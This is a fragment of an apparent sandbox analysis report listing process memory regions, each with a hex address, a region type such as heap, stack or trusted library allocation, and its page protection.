trusted library allocation
|
page read and write
|
||
|
2C6F21A0000
|
heap
|
page read and write
|
||
|
2C6F419E000
|
heap
|
page read and write
|
||
|
2384AA65000
|
heap
|
page read and write
|
||
|
2384A970000
|
heap
|
page read and write
|
||
|
17839054000
|
heap
|
page read and write
|
||
|
17839190000
|
heap
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
2C6F3B70000
|
heap
|
page execute and read and write
|
||
|
2C6F3AE0000
|
trusted library allocation
|
page read and write
|
||
|
178209E0000
|
trusted library allocation
|
page read and write
|
||
|
17822B19000
|
trusted library allocation
|
page read and write
|
||
|
2C6F2278000
|
heap
|
page read and write
|
||
|
7FFAAC454000
|
trusted library allocation
|
page read and write
|
||
|
17822986000
|
trusted library allocation
|
page read and write
|
||
|
4EAADF7000
|
stack
|
page read and write
|
||
|
E75A8FD000
|
stack
|
page read and write
|
||
|
178393E0000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
17821113000
|
trusted library allocation
|
page read and write
|
||
|
2384C925000
|
heap
|
page read and write
|
||
|
1782261C000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
2384A950000
|
heap
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC536000
|
trusted library allocation
|
page execute and read and write
|
||
|
17821407000
|
trusted library allocation
|
page read and write
|
||
|
2384C8B6000
|
heap
|
page read and write
|
||
|
2384C924000
|
heap
|
page read and write
|
||
|
2384C906000
|
heap
|
page read and write
|
||
|
7FFAAC50C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC7B1000
|
trusted library allocation
|
page read and write
|
||
|
1781F1C0000
|
trusted library allocation
|
page read and write
|
||
|
2384AA5B000
|
heap
|
page read and write
|
||
|
4EAB0FE000
|
stack
|
page read and write
|
||
|
7FFAAC453000
|
trusted library allocation
|
page execute and read and write
|
||
|
2384CA11000
|
heap
|
page read and write
|
||
|
2384C925000
|
heap
|
page read and write
|
||
|
1781EF68000
|
heap
|
page read and write
|
||
|
2C6F4160000
|
heap
|
page read and write
|
||
|
178390AF000
|
heap
|
page read and write
|
||
|
2384C923000
|
heap
|
page read and write
|
||
|
7FFAAC49C000
|
trusted library allocation
|
page execute and read and write
|
||
|
E75ABBE000
|
stack
|
page read and write
|
||
|
2384A9EF000
|
heap
|
page read and write
|
||
|
4EAA70E000
|
stack
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
2C6F4350000
|
heap
|
page read and write
|
||
|
2C6F2150000
|
heap
|
page read and write
|
There are 405 hidden memdumps, click here to show them.